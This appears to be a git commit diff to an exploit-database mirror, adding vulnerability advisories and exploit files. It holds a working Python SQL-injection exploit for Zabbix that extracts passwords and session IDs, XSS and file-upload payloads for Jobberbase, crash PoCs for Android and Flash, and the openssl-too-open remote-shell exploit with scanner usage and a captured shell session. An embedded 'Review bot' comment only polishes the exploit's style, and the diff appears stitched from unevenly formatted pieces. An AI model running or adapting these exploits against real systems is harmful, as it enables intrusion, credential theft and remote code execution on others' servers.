Upload Filter Bypass) GLPI 0.85.5 - Arbitrary File Upload / Filter Bypass / Remote Code Execution Dream CMS 2.3.0 - Cross-Site Request Forgery Add Extension / Arbitrary File Upload PHP Code Execution Dream CMS 2.3.0 - Cross-Site Request Forgery (Add Extension) / Arbitrary File Upload / PHP Code Execution vBulletin 5.1.x - Pre-Authentication Remote Code Execution vBulletin 5.1.x - Unauthenticated Remote Code Execution WordPress Ninja Forms 2.7.7 Plugin - Authorization Bypass WordPress WP to Twitter Plugin - Authorization Bypass WordPress Ninja Forms 2.7.7 Plugin - Authentication Bypass WordPress WP to Twitter Plugin - Authentication Bypass Novell ServiceDesk - Authenticated 
File Upload Novell ServiceDesk - Authenticated Arbitrary File Upload Relay Ajax Directory Manager relayb01-071706 / 1.5.1 / 1.5.3 - Unauthenticated File Upload Relay Ajax Directory Manager relayb01-071706 / 1.5.1 / 1.5.3 - Unauthenticated Arbitrary File Upload Easy RM to MP3 Converter 2.7.3.700 - '.m3u' Exploit (Universal DEP + ASLR Bypass) Easy RM to MP3 Converter 2.7.3.700 - '.m3u' Exploit (Universal ASLR + DEP Bypass) phpATM 1.32 - Remote Command Execution (Arbitrary File Upload) on Windows Servers phpATM 1.32 - Arbitrary File Upload / Remote Command Execution (Windows Servers) vBulletin 5.x/4.x - Post-Authentication Persistent Cross-Site Scripting in AdminCP/ApiLog via xmlrpc API vBulletin 4.x - Post-Authentication SQL Injection in breadcrumbs via xmlrpc API vBulletin 5.x/4.x - Authenticated Persistent Cross-Site Scripting in AdminCP/ApiLog via xmlrpc API vBulletin 4.x - Authenticated SQL Injection in breadcrumbs via xmlrpc API Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Post-Authentication Remote Root Exploit (Metasploit) Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Authenticated Remote Root Exploit (Metasploit) Barracuda Web App Firewall 8.0.1.008/Load Balancer 5.4.0.004 - Post-Authentication Remote Root Exploit (Metasploit) (3) Barracuda Web Application Firewall 8.0.1.008 - Post-Authentication Remote Root Exploit (Metasploit) Barracuda Web App Firewall 8.0.1.008/Load Balancer 5.4.0.004 - Authenticated Remote Root Exploit (Metasploit) (3) Barracuda Web Application Firewall 8.0.1.008 - Authenticated Remote Root Exploit (Metasploit) phpMyAdmin 4.6.2 - Post-Authentication Remote Code Execution phpMyAdmin 4.6.2 - Authenticated Remote Code Execution vBulletin 5.2.2 - Pre-Authentication Server Side Request Forgery (SSRF) vBulletin 5.2.2 - Unauthenticated Server Side Request Forgery (SSRF) ZKTeco ZKBioSecurity 3.0 - (visLogin.jsp) Local Authorization Bypass ZKTeco ZKBioSecurity 3.0 - (visLogin.jsp) Local Authentication Bypass
parent
2aa9d941de
commit
0be1ea959a
15 changed files with 1745 additions and 1776 deletions
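--- a/platforms/android/remote/40354.txt
+++ b/platforms/android/remote/40354.txt
@@ -0,0 +1,160 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=840
+
+There's an inconsistency between the way that the two functions in libutils/Unicode.cpp handle invalid surrogate pairs in UTF16, resulting in a mismatch between the size calculated by utf16_to_utf8_length and the number of bytes written by utf16_to_utf8.
+
+This results in a heap-buffer-overflow; one route to this code is the String8 constructor initialising a String8 from a String16. This can be reached via binder calls to the core system service "android.security.keystore" from a normal app context without any additional permissions. There are probably other routes to reach this code with attacker controlled data.
+
+ssize_t utf16_to_utf8_length(const char16_t *src, size_t src_len)
+{
+if (src == NULL || src_len == 0) {
+return -1;
+}
+
+size_t ret = 0;
+const char16_t* const end = src + src_len;
+while (src < end) {
+if ((*src & 0xFC00) == 0xD800 && (src + 1) < end
+&& (*++src & 0xFC00) == 0xDC00) { // <---- increment src here even if condition is false
+// surrogate pairs are always 4 bytes.
+ret += 4;
+src++;
+} else {
+ret += utf32_codepoint_utf8_length((char32_t) *src++); // <---- increment src again
+}
+}
+return ret;
+}
+
+void utf16_to_utf8(const char16_t* src, size_t src_len, char* dst)
+{
+if (src == NULL || src_len == 0 || dst == NULL) {
+return;
+}
+
+const char16_t* cur_utf16 = src;
+const char16_t* const end_utf16 = src + src_len;
+char *cur = dst;
+while (cur_utf16 < end_utf16) {
+char32_t utf32;
+// surrogate pairs
+if((*cur_utf16 & 0xFC00) == 0xD800 && (cur_utf16 + 1) < end_utf16
+&& (*(cur_utf16 + 1) & 0xFC00) == 0xDC00) { // <---- no increment if condition is false
+utf32 = (*cur_utf16++ - 0xD800) << 10;
+utf32 |= *cur_utf16++ - 0xDC00;
+utf32 += 0x10000;
+} else {
+utf32 = (char32_t) *cur_utf16++; // <---- increment src
+}
+const size_t len = utf32_codepoint_utf8_length(utf32);
+utf32_codepoint_to_utf8((uint8_t*)cur, utf32, len);
+cur += len;
+}
+*cur = '\0';
+}
+
+An example character sequence would be the following:
+
+\x41\xd8 \x41\xd8 \x41\xdc \x00\x00
+
+This will be processed by utf16_to_utf8_len like this:
+
+first loop iteration:
+
+\x41\xd8 \x41\xd8 \x41\xdc \x00\x00
+^
+invalid surrogate; skip at (*++src & 0xfc00 == 0xdc00)
+
+\x41\xd8 \x41\xd8 \x41\xdc \x00\x00
+^
+invalid surrogate; emit length 0 at (utf32_codepoint_utf8_length(*src++))
+
+second loop iteration:
+
+\x41\xd8 \x41\xd8 \x41\xdc \x00\x00
+^
+invalid surrogate; emit length 0 at (utf32_codepoint_utf8_length(*src++))
+
+And will be processed by utf16_to_utf8 like this:
+
+first loop iteration:
+
+\x41\xd8 \x41\xd8 \x41\xdc \x00\x00
+^
+invalid surrogate; write 0 length character to output
+
+second loop iteration
+
+\x41\xd8 \x41\xd8 \x41\xdc \x00\x00
+^
+valid surrogate pair 0xd841 0xdc41; emit length 4 character to output
+
+We can then construct a crash PoC using this sequence for the String16 passed to the keystore method 'getKeyCharacteristics' that will perform the String8(String16&) constructor on attacker supplied input; and provide a massive input string. The crash PoC should write 0x20000 * 2/3 bytes into a 2 byte heap allocation. It has been tested on a recent nexus5x userdebug build; resulting in the following crash (the object backing an android::vectorImpl has been corrupted by the overwrite, and "\xf0\xa0\x91\x81" is the utf8 encoding for the utf16 "\x41\xd8 \x41\xdc"):
+
+pid: 16669, tid: 16669, name: keystore >>> /system/bin/keystore <<<
+signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x91a0f08191a110
+x0 8191a0f08191a108 x1 0000000000000000 x2 0000000000000000 x3 0000000000000020
+x4 00000000ffffffa0 x5 0000000000000010 x6 0000000000000001 x7 0000007f802c0018
+x8 0000000000000000 x9 000000000a7c5ac5 x10 0000000000000000 x11 0000000000000000
+x12 000000000000d841 x13 0000000000000841 x14 0000000000000041 x15 0000007f8067bd9e
+x16 0000005565984f08 x17 0000007f80aeee48 x18 00000000ffffff91 x19 0000007fd1de26c0
+x20 8191a0f08191a108 x21 8191a0f08191a0f0 x22 0000000000000000 x23 0000005565984000
+x24 8191a0f08191a0f0 x25 0000007fd1dea7b8 x26 0000007f806690e0 x27 0000007fd1de25d0
+x28 000000556596f000 x29 0000007fd1de2550 x30 0000005565961188
+sp 0000007fd1de2550 pc 0000007f80aeee58 pstate 0000000060000000
+
+backtrace:
+#00 pc 0000000000016e58 /system/lib64/libutils.so (_ZN7android10VectorImpl13editArrayImplEv+16)
+#01 pc 000000000000a184 /system/bin/keystore
+#02 pc 00000000000112d0 /system/bin/keystore
+#03 pc 000000000000b7f4 /system/lib64/libkeystore_binder.so (_ZN7android17BnKeystoreService10onTransactEjRKNS_6ParcelEPS1_j+1560)
+#04 pc 0000000000024c9c /system/lib64/libbinder.so (_ZN7android7BBinder8transactEjRKNS_6ParcelEPS1_j+168)
+#05 pc 000000000002dd98 /system/lib64/libbinder.so (_ZN7android14IPCThreadState14executeCommandEi+1240)
+#06 pc 000000000002de4c /system/lib64/libbinder.so (_ZN7android14IPCThreadState20getAndExecuteCommandEv+140)
+#07 pc 000000000002def4 /system/lib64/libbinder.so (_ZN7android14IPCThreadState14joinThreadPoolEb+76)
+#08 pc 0000000000007a04 /system/bin/keystore (main+1940)
+#09 pc 000000000001bc98 /system/lib64/libc.so (__libc_init+100)
+#10 pc 0000000000007c20 /system/bin/keystore
+
+######################################################
+
+Actually you can compromise many native system services using this bug (ie those not implemented in Java); because of the interface token checking code in Parcel.cpp. See attached for another PoC that takes as a first command line argument the name of the service to crash. On my nexus 5x with very unscientific testing, this includes the following services:
+
+- phone, iphonesubinfo, isub (com.android.phone)
+- telecom, voiceinteraction, backup, audio, location, notification, connectivity, wifi, network_management, statusbar, device_policy, mount, input_method, window, content, account, telephony.registry, user, package, batterystats (system_server)
+- media.audio_policy, media.audio_flinger (mediaserver)
+- drm.drmManager (drmserver)
+- android.security.keystore (keystore)
+- SurfaceFlinger (surfaceflinger)
+
+bool Parcel::enforceInterface(const String16& interface,
+IPCThreadState* threadState) const
+{
+int32_t strictPolicy = readInt32();
+if (threadState == NULL) {
+threadState = IPCThreadState::self();
+}
+if ((threadState->getLastTransactionBinderFlags() &
+IBinder::FLAG_ONEWAY) != 0) {
+// For one-way calls, the callee is running entirely
+// disconnected from the caller, so disable StrictMode entirely.
+// Not only does disk/network usage not impact the caller, but
+// there's no way to commuicate back any violations anyway.
+threadState->setStrictModePolicy(0);
+} else {
+threadState->setStrictModePolicy(strictPolicy);
+}
+const String16 str(readString16());
+if (str == interface) {
+return true;
+} else {
+ALOGW("**** enforceInterface() expected '%s' but read '%s'",
+String8(interface).string(), String8(str).string());
+return false;
+}
+}
+
+
+
+Proofs of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40354.zip
+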
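--- a/platforms/multiple/dos/40355.txt
+++ b/platforms/multiple/dos/40355.txt
@@ -0,0 +1,32 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=845
+
+There is an info leak in the Transform.colorTranform getter. If the constructor for ColorTransform is overwritten with a getter using addProperty, this getter will execute when fetching the constructor, which can then free the MovieClip containing the Tranform.
+
+A minimal PoC is as follows:
+
+this.createEmptyMovieClip( "mc", 1);
+var c = new ColorTransform( 77, 88, 99, 0.5, 1, 2, 3, 4);
+var t:Transform = new Transform( mc );
+t.colorTransform = c;
+this.createTextField( "tf", 2, 0, 0, 2000, 200);
+var ct = ColorTransform;
+var g = flash.geom;
+g.addProperty("ColorTransform", func, func);
+var q = t.colorTransform;
+tf.text = q.greenMultiplier + "\n" + q.blueMultiplier + "\n" + q.color;
+
+function func(){
+
+mc.removeMovieClip();
+
+return ct;
+
+}
+
+
+A sample swf and fla are attached. The PoC prints the value of unallocated memory to the screen.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40355.zip
+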
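--- a/platforms/multiple/dos/40356.txt
+++ b/platforms/multiple/dos/40356.txt
@@ -0,0 +1,21 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=846
+
+If a method is called on a MovieClip, and a getter is set with the name of the method, the getter will get executed during the call, and can free the MovieClip, leading to a user-after-free. A minimal PoC is as follows:
+
+var mc = this.createEmptyMovieClip( "mc", 1);
+mc.addProperty( "f", func, func );
+mc.f("hello");
+
+function func(){
+
+mc.removeMovieClip();
+// Fix heap
+var d:Date = new Date();
+return d.getDate;
+
+}
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40356.zip
+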
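--- a/platforms/php/webapps/40351.txt
+++ b/platforms/php/webapps/40351.txt
@@ -0,0 +1,40 @@
+Jobberbase: http://www.jobberbase.com/
+Version: 2.0
+By Ross Marks: http://www.rossmarks.co.uk
+
+1) Local path disclosure - change any variable to an array and in most cases it will tell you the local path where the application is installed
+eg. http://example.com/api/api.php?action=getJobs&type[]=0&category=0&count=5&random=1&days_behind=7&response=js
+returns: Array to string conversion in <b>/var/www/jobberbase/_lib/class.Job.php</b>
+
+2) Open redirect - when submitting an application can change "Referer:" header to anything and will redirect there
+
+3) reflect XSS in username - http://example.com/admin/
+eg. "><script>alert(1)</script>
+reflect XSS in search: http://example.com/search/|<img src="x" onError="alert(1)">/
+
+4) persistant XSS on admin backend homepage
+create a job and give the URL:
+" onhover="alert(1)
+persistant XSS - admin add to category name (no protection)
+
+5) unrestricted file upload
+upload CV accepts any filetype appends _ uniqueid() to filename
+eg. "file.php" becomes "file_<uniqueid>.php"
+uniquid in in insecure method for generating random sequences and is based on microtime
+if the server is using an older version of PHP a null byte can be used
+ie. "test.php%00.php" would be uploaded as "test.php"
+
+6) code execution race condition:
+if the admin has chosen to not store uploaded CV's
+they are first moved from /tmp to the writable /upload directory before being unlinked
+this gives a brief window of opportunity for an attacker to run http://example.com/uploads/file.php before it is deleted
+
+7) SQL injection in http://example.com/api/api.php?action=getJobs&type=0&category=0&count=5&random=1&days_behind=7&response=js
+days_behind parameter is vulnerable
+
+** notes **
+
+admin change password page don't need old password, no csrf token just a simple POST request.
+admin password stored in md5 format unsalted
+cookies do NOT have "secure" or "HTTPonly" flags enabled
+no csrf anywhere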
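--- a/platforms/php/webapps/40353.py
+++ b/platforms/php/webapps/40353.py
@@ -0,0 +1,56 @@
+# Exploit Title: 2.0 < Zabbix < 3.0.4 SQL Injection Python PoC
+# Data: 20-08-2016
+# Software Link: www.zabbix.com
+# Exploit Author: Unknown(http://seclists.org/fulldisclosure/2016/Aug/82)
+# Version: Zabbix 2.0-3.0.x(<3.0.4)
+
+# PoC Author: Zzzians
+# Contact: Zzzians@gmail.com
+# Test on: Linux (Debian/CentOS/Ubuntu)
+
+# -*- coding: utf_8 -*-
+# Use Shodan or and enjoy :)
+# Comb the intranet for zabbix and enjoy :)
+import sys,os,re,urllib2
+def Inject(url,sql,reg):
+payload = url + "jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=" + urllib2.quote(
+sql) + "&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1"
+try:
+response = urllib2.urlopen(payload, timeout=20).read()
+except Exception, msg:
+print '\t\tOpps,an error occurs...',msg
+else:
+result_reg = re.compile(reg)
+results = result_reg.findall(response)
+print payload #Uncomment this to see details
+if results:
+return results[0]
+def exploit(url,userid):
+passwd_sql = "(select 1 from (select count(*),concat((select(select concat(cast(concat(alias,0x7e,passwd,0x7e) as char),0x7e)) from zabbix.users LIMIT "+str(userid-1)+",1),floor(rand(0)*2))x from information_schema.tables group by x)a)"
+session_sql="(select 1 from (select count(*),concat((select(select concat(cast(concat(sessionid,0x7e,userid,0x7e,status) as char),0x7e)) from zabbix.sessions where status=0 and userid="+str(userid)+" LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)"
+password = Inject(url,passwd_sql,r"Duplicate\s*entry\s*'(.+?)~~")
+if(password):
+print '[+]Username~Password : %s' % password
+else:
+print '[-]Get Password Failed'
+session_id = Inject(url,session_sql,r"Duplicate\s*entry\s*'(.+?)~")
+if(session_id):
+print "[+]Session_id:%s" % session_id
+else:
+print "[-]Get Session id Failed"
+print '\n'
+
+def main():
+print '=' * 70
+print '\t 2.0.x? < Zabbix < 3.0.4 SQL Inject Python Exploit Poc'
+print '\t\t Author:Zzzians(Zzzians@gmail.com)'
+print '\t Reference:http://seclists.org/fulldisclosure/2016/Aug/82'
+print '\t\t\t Time:2016-08-20\n'
+urls = ["http://10.15.5.86"]
+ids = [1,2]
+for url in urls:
+if url[-1] != '/': url += '/'
+print '='*25 + url + '='*25
+for userid in ids:
+exploit(url,userid)
+main()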
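Review bot: The `# -*- coding: utf_8 -*-` declaration sits on line 11 of the new file, below the header comments, where the interpreter ignores it; an encoding cookie is only honoured on the first or second line (PEP 263), so move it to line 1 or drop it. In Inject, `print payload #Uncomment this to see details` is self-contradictory because the statement is active while the comment says to uncomment it; either comment the line out or change the comment to `# Comment this out to hide the request details`. Inject also returns None implicitly both when the request fails and when the regex matches nothing, so the callers' `if(password):` checks cannot tell a network error from a non-matching response; a docstring stating that None covers both cases would make that explicit. The `except Exception, msg:` form and the statement-style print calls are Python 2 only, which is presumably intended given the urllib2 import, but a `# Python 2 only` line in the header would spare readers a SyntaxError under Python 3.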
|
@ -1,3 +1,4 @@
|
|||
/*
|
||||
source: http://www.securityfocus.com/bid/5363/info
|
||||
|
||||
A buffer-overflow vulnerability has been reported in some versions of OpenSSL.
|
||||
|
@ -5,6 +6,7 @@ A buffer-overflow vulnerability has been reported in some versions of OpenSSL.
|
|||
The issue occurs in the handling of the client key value during the negotiation of the SSLv2 protocol. A malicious client may be able to exploit this vulnerability to execute arbitrary code as the vulnerable server process or possibly to create a denial-of-service condition.
|
||||
|
||||
***UPDATE: A worm that likely exploits this vulnerability has been discovered propagating in the wild. Additionally, this code includes peer-to-peer and distributed denial-of-service capabilities. There have been numerous reports of intrusions in Europe. It is not yet confirmed whether this vulnerability is in OpenSSL, mod_ssl, or another component. Administrators are advised to upgrade to the most recent versions or to disable Apache, if possible, until more information is available.
|
||||
*/
|
||||
|
||||
/*
|
||||
* VERY PRIV8 spabam SPAX@zone-h.org
|
||||
|
|
444
platforms/unix/remote/40347.txt
Executable file
444
platforms/unix/remote/40347.txt
Executable file
|
@ -0,0 +1,444 @@
|
|||
/*
|
||||
* openssl-too-open.c - OpenSSL remote exploit
|
||||
* Spawns a nobody/apache shell on Apache, root on other servers.
|
||||
*
|
||||
* by Solar Eclipse <solareclipse@phreedom.org>
|
||||
*
|
||||
* Thanks to Core, HD Moore, Zillion, Dvorak and Black Berry for their help.
|
||||
*
|
||||
* This code or any derivative versions of it may not be posted to Bugtraq
|
||||
* or anywhere on SecurityFocus, Symantec or any affiliated site.
|
||||
*
|
||||
*/
|
||||
|
||||
---------[ ./openssl-too-open ]
|
||||
|
||||
openssl-too-open is a remote exploit for the KEY_ARG overflow in
|
||||
OpenSSL 0.9.6d and older. It will give you a remote shell with the
|
||||
priviledges of the server process (nobody when used against Apache,
|
||||
root against other servers).
|
||||
|
||||
Only Linux/x86 targets are supported.
|
||||
|
||||
: openssl-too-open : OpenSSL remote exploit
|
||||
by Solar Eclipse <solareclipse@phreedom.org>
|
||||
|
||||
Usage: ./openssl-too-open [options] <host>
|
||||
-a <arch> target architecture (default is 0x00)
|
||||
-p <port> SSL port (default is 443)
|
||||
-c <N> open N apache connections before sending the shellcode (default is 30)
|
||||
-m <N> maximum number of open connections (default is 50)
|
||||
-v verbose mode
|
||||
|
||||
Supported architectures:
|
||||
0x00 - Gentoo (apache-1.3.24-r2)
|
||||
0x01 - Debian Woody GNU/Linux 3.0 (apache-1.3.26-1)
|
||||
0x02 - Slackware 7.0 (apache-1.3.26)
|
||||
0x03 - Slackware 8.1-stable (apache-1.3.26)
|
||||
0x04 - RedHat Linux 6.0 (apache-1.3.6-7)
|
||||
0x05 - RedHat Linux 6.1 (apache-1.3.9-4)
|
||||
0x06 - RedHat Linux 6.2 (apache-1.3.12-2)
|
||||
0x07 - RedHat Linux 7.0 (apache-1.3.12-25)
|
||||
0x08 - RedHat Linux 7.1 (apache-1.3.19-5)
|
||||
0x09 - RedHat Linux 7.2 (apache-1.3.20-16)
|
||||
0x0a - Redhat Linux 7.2 (apache-1.3.26 w/PHP)
|
||||
0x0b - RedHat Linux 7.3 (apache-1.3.23-11)
|
||||
0x0c - SuSE Linux 7.0 (apache-1.3.12)
|
||||
0x0d - SuSE Linux 7.1 (apache-1.3.17)
|
||||
0x0e - SuSE Linux 7.2 (apache-1.3.19)
|
||||
0x0f - SuSE Linux 7.3 (apache-1.3.20)
|
||||
0x10 - SuSE Linux 8.0 (apache-1.3.23-137)
|
||||
0x11 - SuSE Linux 8.0 (apache-1.3.23)
|
||||
0x12 - Mandrake Linux 7.1 (apache-1.3.14-2)
|
||||
0x13 - Mandrake Linux 8.0 (apache-1.3.19-3)
|
||||
0x14 - Mandrake Linux 8.1 (apache-1.3.20-3)
|
||||
0x15 - Mandrake Linux 8.2 (apache-1.3.23-4)
|
||||
|
||||
Examples: ./openssl-too-open -a 0x01 -v localhost
|
||||
./openssl-too-open -p 1234 192.168.0.1 -c 40 -m 80
|
||||
|
||||
|
||||
---------[ ./openssl-scanner ]
|
||||
|
||||
openssl-scanner scans a number of hosts for vulnerable OpenSSL
|
||||
implementations.
|
||||
|
||||
: openssl-scanner : OpenSSL vulnerability scanner
|
||||
by Solar Eclipse <solareclipse@phreedom.org>
|
||||
|
||||
Usage: ./openssl-scanner [options] <host>
|
||||
-i <inputfile> file with target hosts
|
||||
-o <outputfile> output log
|
||||
-a append to output log (requires -o)
|
||||
-b check for big endian servers
|
||||
-C scan the entire class C network the host belogs to
|
||||
-d debug mode
|
||||
-w N connection timeout in seconds
|
||||
|
||||
Examples: ./openssl-scanner -d 192.168.0.1
|
||||
./openssl-scanner -i hosts -o my.log -w 5
|
||||
|
||||
|
||||
---------[ Screenshots ]
|
||||
|
||||
$ ./openssl-scanner -C 192.168.0.0
|
||||
: openssl-scanner : OpenSSL vulnerability scanner
|
||||
by Solar Eclipse <solareclipse@phreedom.org>
|
||||
|
||||
Opening 255 connections . . . . . . . . . . done
|
||||
Waiting for all connections to finish . . . . . . . . . . . done
|
||||
|
||||
192.168.0.136: Vulnerable
|
||||
|
||||
|
||||
$ nc 192.168.0.1 80
|
||||
HEAD / HTTP/1.0
|
||||
|
||||
HTTP/1.1 200 OK
|
||||
Date: Tue, 17 Sep 2002 17:47:44 GMT
|
||||
Server: Apache-AdvancedExtranetServer/1.3.20 (Mandrake Linux/3mdk) mod_ssl/2.8.4 OpenSSL/0.9.6b
|
||||
Connection: close
|
||||
Content-Type: text/html
|
||||
|
||||
|
||||
./openssl-too-open -a 0x14 192.168.0.1
|
||||
: openssl-too-open : OpenSSL remote exploit
|
||||
by Solar Eclipse <solareclipse@phreedom.org>
|
||||
|
||||
: Opening 30 connections
|
||||
Establishing SSL connections
|
||||
|
||||
: Using the OpenSSL info leak to retrieve the addresses
|
||||
ssl0 : 0x810b3a0
|
||||
ssl1 : 0x810b360
|
||||
ssl2 : 0x810b4e0
|
||||
|
||||
* Addresses don't match.
|
||||
|
||||
: Opening 40 connections
|
||||
Establishing SSL connections
|
||||
|
||||
: Using the OpenSSL info leak to retrieve the addresses
|
||||
ssl0 : 0x8103830
|
||||
ssl1 : 0x80fd668
|
||||
ssl2 : 0x80fd668
|
||||
|
||||
* Addresses don't match.
|
||||
|
||||
: Opening 50 connections
|
||||
Establishing SSL connections
|
||||
|
||||
: Using the OpenSSL info leak to retrieve the addresses
|
||||
ssl0 : 0x8103830
|
||||
ssl1 : 0x8103830
|
||||
ssl2 : 0x8103830
|
||||
|
||||
: Sending shellcode
|
||||
ciphers: 0x8103830 start_addr: 0x8103770 SHELLCODE_OFS: 184
|
||||
Reading tag
|
||||
Execution of stage1 shellcode succeeded, sending stage2
|
||||
Spawning shell...
|
||||
|
||||
bash: no job control in this shell
|
||||
bash-2.05$
|
||||
bash-2.05$ uname -a; id; w;
|
||||
Linux localhost.localdomain 2.4.8-26mdk #1 Sun Sep 23 17:06:39 CEST 2001 i686 unknown
|
||||
uid=48(apache) gid=48(apache) groups=48(apache)
|
||||
1:49pm up 4:26, 1 user, load average: 0.04, 0.07, 0.07
|
||||
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
|
||||
bash-2.05$
|
||||
|
||||
|
||||
---------[ How Does openssl-too-open Work? ]
|
||||
|
||||
It is important to understand the SSL2 handshake in order to successfully
|
||||
exploit the KEY_ARG vulnerability.
|
||||
|
||||
---/ Typical SSL2 Handshake
|
||||
|
||||
|
||||
Client Server
|
||||
|
||||
CLIENT_HELLO -->
|
||||
|
||||
<-- SERVER_HELLO
|
||||
|
||||
CLIENT_MASTER_KEY -->
|
||||
|
||||
<-- SERVER_VERIFY
|
||||
|
||||
CLIENT_FINISHED -->
|
||||
|
||||
<-- SERVER_FINISHED
|
||||
|
||||
The CLIENT_HELLO message contains a list of the ciphers the client supports,
|
||||
a session id and some challenge data. The session id is used if the client
|
||||
wishes to reuse an already established session, otherwise it's empty.
|
||||
|
||||
The server replies with a SERVER_HELLO message, also listing all supported
|
||||
ciphers and includes a certificate with its public RSA key. The server
|
||||
also sends a connection id, which will later be used by the client to
|
||||
verify that the encryption works.
|
||||
|
||||
The client generates a random master key, encrypts it with the server's
|
||||
public key and sends it with a CLIENT_MASTER_KEY message. This message
|
||||
also specifies the cipher selected by the client and a KEY_ARG field,
|
||||
which meaning depends on the specified cipher. For DES-CBC ciphers, the
|
||||
KEY_ARG contains the initialization vector.
|
||||
|
||||
Now both the client and the server have the master key and they can generate
|
||||
the session keys from it. All messages from this point on are encrypted.
|
||||
|
||||
The server replies with a SERVER_VERIFY message, containing the challenge
|
||||
data from the CLIENT_HELLO message. If the key exchange has been successful,
|
||||
the client will be able to decrypt this message and the challenge data returned
|
||||
from the server will match the challenge data sent by the client.
|
||||
|
||||
The client sends a CLIENT_FINISHED message with a copy of the connection id
|
||||
from the SERVER_HELLO packet. It is now the server's turn to decrypt this
|
||||
message and check if the connection id returned by the client matches the
|
||||
connection it sent by the server.
|
||||
|
||||
Finally the server sends a SERVER_FINISHED message, completing the handshake.
|
||||
This message contains a session id, generated by the server. If the client
|
||||
wishes to reuse the session later, it can send this session id with the
|
||||
CLIENT_HELLO message.
|
||||
|
||||
|
||||
---/ The KEY_ARG Buffer Overflow
|
||||
|
||||
The bug is in ssl/s2_srvr.c, in the get_client_master_key() function. This
|
||||
function reads a CLIENT_MASTER_KEY packet and processes it. It reads the
|
||||
KEY_ARG_LENGTH value from the client and then copies that many bytes in an
|
||||
array of a fixed size. This array is part of the SSL_SESSION structure.
|
||||
If the client specifies a KEY_ARG longer than 8 bytes, the variables in the
|
||||
SSL_SESSION structure can be overwritten with user supplied data.
|
||||
|
||||
Let's look at the definition of this structure.
|
||||
|
||||
typedef struct ssl_session_st
|
||||
{
|
||||
int ssl_version; /* what ssl version session info is
|
||||
* being kept in here? */
|
||||
|
||||
/* only really used in SSLv2 */
|
||||
unsigned int key_arg_length;
|
||||
unsigned char key_arg[SSL_MAX_KEY_ARG_LENGTH];
|
||||
int master_key_length;
|
||||
unsigned char master_key[SSL_MAX_MASTER_KEY_LENGTH];
|
||||
/* session_id - valid? */
|
||||
unsigned int session_id_length;
|
||||
unsigned char session_id[SSL_MAX_SSL_SESSION_ID_LENGTH];
|
||||
/* this is used to determine whether the session is being reused in
|
||||
* the appropriate context. It is up to the application to set this,
|
||||
* via SSL_new */
|
||||
unsigned int sid_ctx_length;
|
||||
unsigned char sid_ctx[SSL_MAX_SID_CTX_LENGTH];
|
||||
|
||||
int not_resumable;
|
||||
|
||||
/* The cert is the certificate used to establish this connection */
|
||||
struct sess_cert_st /* SESS_CERT */ *sess_cert;
|
||||
|
||||
/* This is the cert for the other end.
|
||||
* On clients, it will be the same as sess_cert->peer_key->x509
|
||||
* (the latter is not enough as sess_cert is not retained
|
||||
* in the external representation of sessions, see ssl_asn1.c). */
|
||||
X509 *peer;
|
||||
/* when app_verify_callback accepts a session where the peer's certificate
|
||||
* is not ok, we must remember the error for session reuse: */
|
||||
long verify_result; /* only for servers */
|
||||
|
||||
int references;
|
||||
long timeout;
|
||||
long time;
|
||||
|
||||
int compress_meth; /* Need to lookup the method */
|
||||
|
||||
SSL_CIPHER *cipher;
|
||||
unsigned long cipher_id; /* when ASN.1 loaded, this
|
||||
* needs to be used to load
|
||||
* the 'cipher' structure */
|
||||
|
||||
STACK_OF(SSL_CIPHER) *ciphers; /* shared ciphers? */
|
||||
|
||||
CRYPTO_EX_DATA ex_data; /* application specific data */
|
||||
|
||||
/* These are used to make removal of session-ids more
|
||||
* efficient and to implement a maximum cache size. */
|
||||
struct ssl_session_st *prev,*next;
|
||||
} SSL_SESSION;
|
||||
|
||||
It really looks better with VIM coloring. Anyway, we know the size of the
|
||||
structure and it's allocated on the heap. The first thing that comes to
|
||||
mind is to overwrite the next malloc chunk and then make the OpenSSL code
|
||||
call free() on the SSL_SESSION structure.
|
||||
|
||||
After we send a CLIENT_MASTER_KEY message, we'll read a SERVER_VERIFY packet
|
||||
from the server and then we'll respond with a CLIENT_FINISHED message.
|
||||
The server uses this the contents of this message to verify that the
|
||||
key exchange succeeded. If we return a wrong connection id, the server
|
||||
will abort the connection and free the SSL_SESSION structure, which is
|
||||
exactly what we want.
|
||||
|
||||
We'll overwrite the KEY_ARG array with 8 random bytes and the following
|
||||
string:
|
||||
|
||||
unsigned char overwrite_next_chunk[] =
|
||||
"AAAA" /* int master_key_length; */
|
||||
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char master_key[SSL_MAX_MASTER_KEY_LENGTH]; */
|
||||
"AAAA" /* unsigned int session_id_length; */
|
||||
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char session_id[SSL_MAX_SSL_SESSION_ID_LENGTH]; */
|
||||
"AAAA" /* unsigned int sid_ctx_length; */
|
||||
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char sid_ctx[SSL_MAX_SID_CTX_LENGTH]; */
|
||||
"AAAA" /* unsigned int sid_ctx_length; */
|
||||
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char sid_ctx[SSL_MAX_SID_CTX_LENGTH]; */
|
||||
"AAAA" /* int not_resumable; */
|
||||
"\x00\x00\x00\x00" /* struct sess_cert_st *sess_cert; */
|
||||
"\x00\x00\x00\x00" /* X509 *peer; */
|
||||
"AAAA" /* long verify_result; */
|
||||
"\x01\x00\x00\x00" /* int references; */
|
||||
"AAAA" /* int timeout; */
|
||||
"AAAA" /* int time */
|
||||
